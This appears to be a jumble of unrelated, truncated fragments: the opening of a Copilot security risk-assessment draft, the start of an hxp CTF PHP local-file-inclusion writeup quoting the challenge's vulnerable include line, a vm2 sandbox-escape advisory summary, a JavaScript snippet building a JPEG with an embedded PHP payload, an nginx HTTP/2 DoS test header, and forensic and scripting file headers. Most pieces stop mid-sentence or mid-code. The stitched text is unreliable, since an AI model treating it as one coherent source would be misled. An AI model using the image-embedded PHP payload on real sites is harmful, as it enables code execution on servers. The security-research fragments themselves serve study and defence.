tmr ttttmr

Program Analysis Resources

(draft; work in progress)

Risk Assessment of GitHub Copilot

0xabad1dea, July 2021

this is a rough draft and may be updated with more examples

GitHub was kind enough to grant me swift access to the Copilot test phase despite me @'ing them several hundred times about ICE. I would like to examine it not in terms of productivity, but security. How risky is it to allow an AI to write some or all of your code?

Ultimately, a human being must take responsibility for every line of code that is committed. AI should not be used for "responsibility washing." However, Copilot is a tool, and workers need their tools to be reliable. A carpenter doesn't have to

Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

Sandbox Escape in [email protected]

Summary

There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside handleException() which can be used to escape the sandbox and run arbitrary code in host context.

	javascript: (function () {
	let rsshub_host = 'https://rsshub.app';
	let lilydjwg_host = 'https://rss.lilydjwg.me';

	let cnblog = 'https://www.cnblogs.com/';
	let csdn = 'https://blog.csdn.net/';
	let feed43 = 'https://feed43.com';
	let jianshu_user = '/jianshu/user/';
	let zhihu_user = '/zhihu/people/activities/';
	let zhihu_zhuanlan = '/zhihu/zhuanlan/';

	var wpnonce = '';
	var ajaxnonce = '';
	var wp_attached_file = '';
	var imgurl = '';
	var postajaxdata = '';
	var post_id = 0;
	var cmd = '<?php phpinfo();/*';
	var cmdlen = cmd.length
	var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
	var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);

	# Empty headers in HTTP/2 streams can cause DoS. A test based on http://hg.nginx.org/nginx-tests .
	# Takes around 8 seconds without the patch at https://github.com/nginx/nginx/commit/6dfbc8b1c2116f362bb871efebbf9df576738e89
	# Start 2019-08-14 1565776248
	# End 2019-08-14 1565776256
	# https://www.nginx.com/blog/nginx-updates-mitigate-august-2019-http-2-vulnerabilities/

	use POSIX qw/strftime/;
	print "Start ", strftime('%Y-%m-%d %s',localtime), " \n";

	$s = Test::Nginx::HTTP2->new();

	//------------------------------------------------
	//--- 010 Editor v8.0.1 Binary Template
	//
	// File: Transactional Registry Transaction Logs (.TxR)
	// Authors: Willi Ballenthin <[email protected]>
	// Version: 0.1
	// Reference: https://www.fireeye.com/blog/threat-research/2019/01/digging-up-the-past-windows-registry-forensics-revisited.html
	//------------------------------------------------

	LittleEndian();

	'''
	Usage: python archive_articles.py test.csv
	Input: test.csv
	name url
	1 url1
	2 url2
	.....
	output:
	1.png
	2.png